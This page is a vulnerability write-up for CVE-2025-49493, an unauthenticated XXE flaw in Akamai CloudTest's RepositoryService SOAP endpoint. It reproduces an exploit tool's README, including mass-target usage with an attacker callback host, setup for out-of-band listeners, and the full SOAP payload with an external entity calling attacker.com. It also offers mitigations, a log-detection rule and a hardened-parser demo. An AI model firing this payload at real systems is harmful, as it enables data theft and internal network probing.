Akamai CloudTest XML External Entity (XXE) Injection Vulnerability

Vulnerability Information

Vulnerability name: Akamai CloudTest XML External Entity (XXE) Injection Vulnerability

Vulnerability ID:

  • CVE: CVE-2025-49493

Vulnerability type: XML external entity injection

Severity: Critical

Description: Akamai CloudTest is a widely used cloud-based testing service that helps enterprises evaluate the performance and security of their web applications. It is typically deployed in enterprise environments to simulate high traffic and attack scenarios so that application stability and security can be verified.

The vulnerability lies in a SOAP service endpoint of Akamai CloudTest, specifically /concerto/services/RepositoryService. Because external entities declared in incoming XML are not neutralised before the input is parsed, an attacker can craft a malicious XML payload that triggers an XXE attack. This class of vulnerability allows information disclosure, server-side request forgery (SSRF), denial of service (DoS) and, in some configurations, remote code execution (RCE).

Because the vulnerability can be exploited without authentication and the attack vector is the network, the potential risk is very high. An attacker can use it to retrieve sensitive information remotely, such as the contents of system files, or to reach other services on the internal network via SSRF. In addition, because XXE can cause service disruption, enterprises that rely on Akamai CloudTest for business-critical operations may suffer serious business impact.

Vendor: Akamai

Product: Akamai CloudTest

Affected versions: Before 60 2025.06.02 (12988)

Source: https://github.com/SystemVll/CVE-2025-49493

Type: CVE-2025: github search

Repository files

  • .python-version
  • README.md
  • main.py
  • pyproject.toml
  • targets.txt
  • uv.lock

Source overview

Akamai CloudTest XXE Exploit (CVE-2025-49493)

Overview

This is a Python-based exploit for CVE-2025-49493, which affects Akamai CloudTest versions before 60 2025.06.02 (12988). The vulnerability allows for XML External Entity (XXE) injection through the SOAP service endpoint.

Vulnerability Details

  • CVE ID: CVE-2025-49493
  • Vulnerability Type: XML External Entity (XXE) Injection
  • Severity: Critical (CVSS 9.1)
  • Affected Software: Akamai CloudTest
  • Affected Versions: Before 60 2025.06.02 (12988)
  • Attack Vector: Network
  • Authentication Required: No

Technical Details

The vulnerability exists in the /concerto/services/RepositoryService SOAP endpoint, where the service's XML parser processes attacker-supplied input with external entity resolution still enabled. An unauthenticated attacker can therefore send a SOAP envelope whose DTD declares an external entity, triggering XXE attacks that can lead to:

  • Information disclosure
  • SSRF (Server-Side Request Forgery)
  • Denial of Service
  • Potential RCE in certain configurations

Features

  • Target Discovery: Automatically identifies Akamai CloudTest instances
  • Vulnerability Detection: Checks for vulnerable endpoints and indicators
  • XXE Exploitation: Sends crafted SOAP requests with XXE payloads
  • Multiple Targets: Supports batch processing from target files
  • Detailed Logging: Comprehensive colored logging with timestamps
  • Error Handling: Robust error handling for network issues

Installation

Prerequisites

  • Python 3.6 or higher
  • pip package manager

Dependencies

Install required packages (note that the repository file list above shows a pyproject.toml and uv.lock rather than a requirements.txt; if that file is absent from your checkout, install the packages manually as shown below):

pip install -r requirements.txt

Or install manually:

pip install requests urllib3 colored pyfiglet

Usage

Basic Usage

python main.py targets.txt xxe.attacker.com

Advanced Usage

# With custom timeout
python main.py targets.txt collaborator.burp.com --timeout 20

# Using interactsh for OOB detection
python main.py targets.txt attacker.interactsh.com

Command Line Options

positional arguments:
  targets            Target file containing list of Akamai CloudTest hosts
  xxe_server         XXE server to capture requests (e.g., attacker.com or IP)

optional arguments:
  -h, --help         show this help message and exit
  --timeout TIMEOUT  Request timeout in seconds (default: 10)

Target File Format

Create a targets.txt file with one target per line:

https://example-cloudtest.akamai.com
https://demo-cloudtest.example.com
https://test-cloudtest.internal.company.com
https://cloudtest.example.org

Setting up XXE Server

Option 1: Using Burp Collaborator

  1. Open Burp Suite Professional
  2. Go to Burp > Burp Collaborator client
  3. Click “Copy to clipboard” to get your collaborator URL
  4. Use this URL as the xxe_server parameter

Option 2: Using Interactsh

  1. Install interactsh: go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest
  2. Run: interactsh-client
  3. Use the provided URL as the xxe_server parameter

Option 3: Custom HTTP Server

Set up a simple HTTP server to capture requests. Run it from an empty directory, because SimpleHTTPRequestHandler serves whatever is in the current working directory, and remember that it listens on port 8000, so the callback URL handed to the target must carry that port unless you bind to 80 instead:

# simple_server.py
import http.server
import socketserver

class RequestHandler(http.server.SimpleHTTPRequestHandler):
    def do_GET(self):
        # Any GET arriving here means the target's parser resolved the external entity
        print(f"XXE Request received: {self.path}")
        print(f"Headers: {self.headers}")
        super().do_GET()

socketserver.TCPServer.allow_reuse_address = True  # restart cleanly between runs

with socketserver.TCPServer(("", 8000), RequestHandler) as httpd:
    print("Server running on port 8000")
    httpd.serve_forever()

Exploit Flow

  1. Target Validation: Validates URL format and accessibility
  2. Vulnerability Detection:
    • Checks for CloudTest indicators in response
    • Verifies SOAP service endpoint exists
  3. XXE Payload Generation: Creates malicious SOAP envelope with XXE
  4. Exploitation: Sends crafted request to vulnerable endpoint
  5. Result Analysis: Analyzes response for success indicators

XXE Payload Structure

The exploit uses the following XXE payload structure:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE soapenv:Envelope [
<!ENTITY xxe SYSTEM "http://attacker.com">
]>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:rep="http://example.com/services/repository">
<soapenv:Header/>
<soapenv:Body>
<rep:getUIBundleObjectXml>
<rep:uiBundleRequestXml>&xxe;</rep:uiBundleRequestXml>
</rep:getUIBundleObjectXml>
</soapenv:Body>
</soapenv:Envelope>

Mitigation

For Administrators

  1. Immediate Actions:

    • Update Akamai CloudTest to version 60 2025.06.02 or later
    • Monitor logs for suspicious XML processing activities
    • Implement network segmentation to limit exposure
  2. Long-term Solutions:

    • Disable XML external entity processing in XML parsers
    • Implement input validation and sanitization
    • Use allow-lists for XML processing
    • Regular security assessments
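As an added example (not from the exploit repository or the advisory), here is a request-inspection rule an administrator could run over proxy or application logs to act on the "monitor logs" item above. It flags any POST to the RepositoryService endpoint whose body carries a DOCTYPE, and raises the severity when the DTD declares an external (SYSTEM/PUBLIC) entity, which is the shape of the README payload. The sample requests are constructed, and the assumption that legitimate CloudTest SOAP requests never need a DOCTYPE is mine, not the vendor's.

```python
import re

# Endpoint named in the advisory. Assumption for this rule: genuine SOAP
# requests to it are plain envelopes and never carry a DOCTYPE.
SOAP_ENDPOINT = "/concerto/services/RepositoryService"

# <!DOCTYPE ...> anywhere in the body (case-insensitive, as parsers accept it).
DOCTYPE_RE = re.compile(rb"<!DOCTYPE\b", re.IGNORECASE)
# General or parameter (%) entity whose replacement text comes from a
# SYSTEM or PUBLIC identifier, i.e. an external entity declaration.
EXTERNAL_ENTITY_RE = re.compile(
    rb"<!ENTITY\s+%?\s*[\w.:-]+\s+(?:SYSTEM|PUBLIC)\b", re.IGNORECASE)


def inspect_request(method, path, body):
    """Classify one HTTP request. Returns (severity, reason) or None."""
    if method.upper() != "POST" or not path.startswith(SOAP_ENDPOINT):
        return None
    if EXTERNAL_ENTITY_RE.search(body):
        return ("high", "external entity (SYSTEM/PUBLIC) declared in SOAP body")
    if DOCTYPE_RE.search(body):
        return ("medium", "DOCTYPE present in SOAP body")
    return None


def scan(requests):
    """Run inspect_request over (method, path, body) tuples and return the
    hits as (index, severity, reason)."""
    findings = []
    for index, (method, path, body) in enumerate(requests):
        hit = inspect_request(method, path, body)
        if hit is not None:
            findings.append((index, *hit))
    return findings


def _envelope(prolog, inner):
    """Constructed SOAP body: `prolog` goes before the root element, `inner`
    becomes the uiBundleRequestXml content (mirrors the README payload)."""
    return (prolog +
            b'<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"'
            b' xmlns:rep="http://example.com/services/repository">'
            b'<soapenv:Header/><soapenv:Body><rep:getUIBundleObjectXml>'
            b'<rep:uiBundleRequestXml>' + inner + b'</rep:uiBundleRequestXml>'
            b'</rep:getUIBundleObjectXml></soapenv:Body></soapenv:Envelope>')


# Constructed traffic, not captured from any real system.
SAMPLE_REQUESTS = [
    # 0: ordinary request, no DTD at all
    ("POST", SOAP_ENDPOINT, _envelope(b'<?xml version="1.0"?>', b"bundle-1")),
    # 1: the README-style payload with an external general entity
    ("POST", SOAP_ENDPOINT, _envelope(
        b'<?xml version="1.0"?><!DOCTYPE soapenv:Envelope ['
        b'<!ENTITY xxe SYSTEM "http://oob.example.test/">]>', b"&xxe;")),
    # 2: parameter-entity variant, lower-case doctype, file:// target
    ("POST", SOAP_ENDPOINT, _envelope(
        b'<!doctype x [<!ENTITY % ext SYSTEM "file:///etc/passwd"> %ext;]>', b"x")),
    # 3: DOCTYPE with only an internal entity: suspicious, but no external fetch
    ("POST", SOAP_ENDPOINT, _envelope(
        b'<!DOCTYPE x [<!ENTITY greeting "hello">]>', b"&greeting;")),
    # 4: unrelated GET to the web UI
    ("GET", "/concerto/", b""),
    # 5: same payload to a different path: outside this rule's scope
    ("POST", "/concerto/services/Other", _envelope(
        b'<!DOCTYPE x [<!ENTITY xxe SYSTEM "http://oob.example.test/">]>', b"&xxe;")),
]


if __name__ == "__main__":
    for index, severity, reason in scan(SAMPLE_REQUESTS):
        print(f"request {index}: {severity}: {reason}")
```

Sample 5 is deliberately left unflagged to show that the rule is scoped to the endpoint the advisory names; widening SOAP_ENDPOINT to the whole /concerto/services/ prefix is a reasonable choice if other SOAP services share the same parser.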

For Developers

  1. Secure XML Processing:

    # Disable external entities in XML parsers.
    # The C-accelerated xml.etree.ElementTree.XMLParser exposes no .parser
    # attribute, so poking expat handlers through it does not work; use
    # defusedxml, which refuses DTDs, entity expansion and external references:
    import defusedxml.ElementTree as ET
    tree = ET.fromstring(untrusted_xml, forbid_dtd=True,
                         forbid_entities=True, forbid_external=True)
  2. Input Validation:

    • Validate all XML input against strict schemas
    • Sanitize user-controlled data before XML processing
    • Implement proper error handling
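The following added example is not part of the README or of CloudTest itself; it ties the XXE Payload Structure section to the Secure XML Processing item above. It parses the README's SOAP envelope twice with Python's expat bindings: once with a resolver that honours SYSTEM identifiers, which is how a permissive SOAP stack leaks data, and once with a parser that rejects the DOCTYPE before any entity can be declared. So that it runs offline, the entity points at a file:// URI of a temporary file holding a constructed "secret" instead of an http:// callback; the envelope and namespace URI are taken from the page, while the two parser configurations are mine and say nothing about which parser CloudTest actually uses.

```python
import os
import tempfile
import xml.parsers.expat as expat
from pathlib import Path
from urllib.parse import urlparse
from urllib.request import url2pathname

# Envelope from the README payload, with the SYSTEM id left as a placeholder.
# Offline stand-in: a file:// URI instead of the xxe_server http:// callback.
ENVELOPE = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE soapenv:Envelope [
<!ENTITY xxe SYSTEM "{uri}">
]>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:rep="http://example.com/services/repository">
<soapenv:Header/>
<soapenv:Body>
<rep:getUIBundleObjectXml>
<rep:uiBundleRequestXml>&xxe;</rep:uiBundleRequestXml>
</rep:getUIBundleObjectXml>
</soapenv:Body>
</soapenv:Envelope>
"""


def parse_resolving(xml_bytes):
    """Parse like a permissive SOAP stack: fetch whatever the SYSTEM id names
    and splice it into the document. This is the behaviour that makes XXE work."""
    text = []
    parser = expat.ParserCreate()

    def fetch_external(context, base, system_id, public_id):
        scheme, _, path = urlparse(system_id)[:3]
        if scheme != "file":
            return 0  # offline demo: only file:// is honoured here
        with open(url2pathname(path), "rb") as fh:
            data = fh.read()
        # The child parser inherits our handlers, so the fetched bytes land in `text`
        child = parser.ExternalEntityParserCreate(context)
        child.Parse(data, True)
        return 1

    parser.ExternalEntityRefHandler = fetch_external
    parser.CharacterDataHandler = text.append
    parser.Parse(xml_bytes, True)
    return "".join(text).strip()


def parse_hardened(xml_bytes):
    """Reject any DOCTYPE, so no entity can be declared at all, and refuse to
    resolve external identifiers as a second line of defence."""
    text = []
    parser = expat.ParserCreate()

    def reject_doctype(name, system_id, public_id, has_internal_subset):
        raise ValueError("DOCTYPE not allowed in SOAP request (possible XXE)")

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.ExternalEntityRefHandler = lambda *args: 0  # returning 0 aborts the parse
    parser.CharacterDataHandler = text.append
    parser.Parse(xml_bytes, True)
    return "".join(text).strip()


def run_demo():
    """Write a stand-in secret file, then parse the same payload both ways.
    Returns (what the permissive parser leaked, whether the hardened one refused)."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as fh:
        fh.write("secret-token-123\n")  # constructed stand-in for a system file
        secret_path = fh.name
    try:
        payload = ENVELOPE.format(uri=Path(secret_path).as_uri()).encode()
        leaked = parse_resolving(payload)
        try:
            parse_hardened(payload)
            refused = False
        except ValueError:
            refused = True
        return leaked, refused
    finally:
        os.unlink(secret_path)


if __name__ == "__main__":
    leaked, refused = run_demo()
    print(f"permissive parser leaked: {leaked!r}")
    print(f"hardened parser refused the DOCTYPE: {refused}")
```

The hardened parser still handles ordinary envelopes, because a SOAP request never needs a DTD; the same policy on a JAXP/Xerces stack is the disallow-doctype-decl feature, which is the single setting that closes this whole class of bug.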

Disclaimer

This tool is provided for educational and authorized testing purposes only. Users are responsible for ensuring they have proper authorization before testing any systems. The authors are not responsible for any misuse or damage caused by this tool.

Contributing

  1. Fork the repository
  2. Create a feature branch
  3. Make your changes
  4. Add tests if applicable
  5. Submit a pull request

License

This project is licensed under the MIT License - see the LICENSE file for details.

Authors

  • Original Research: xbow, 3th1c_yuk1
  • Exploit Development: Security Research Team
  • CVE Assignment: CVE-2025-49493

Changelog

v1.0.0

  • Initial release
  • Basic XXE exploitation functionality
  • Target file support
  • Comprehensive logging
  • Error handling improvements

http://example.com/2025/07/14/github_1400905342/
Author: lianccc
Published: 14 July 2025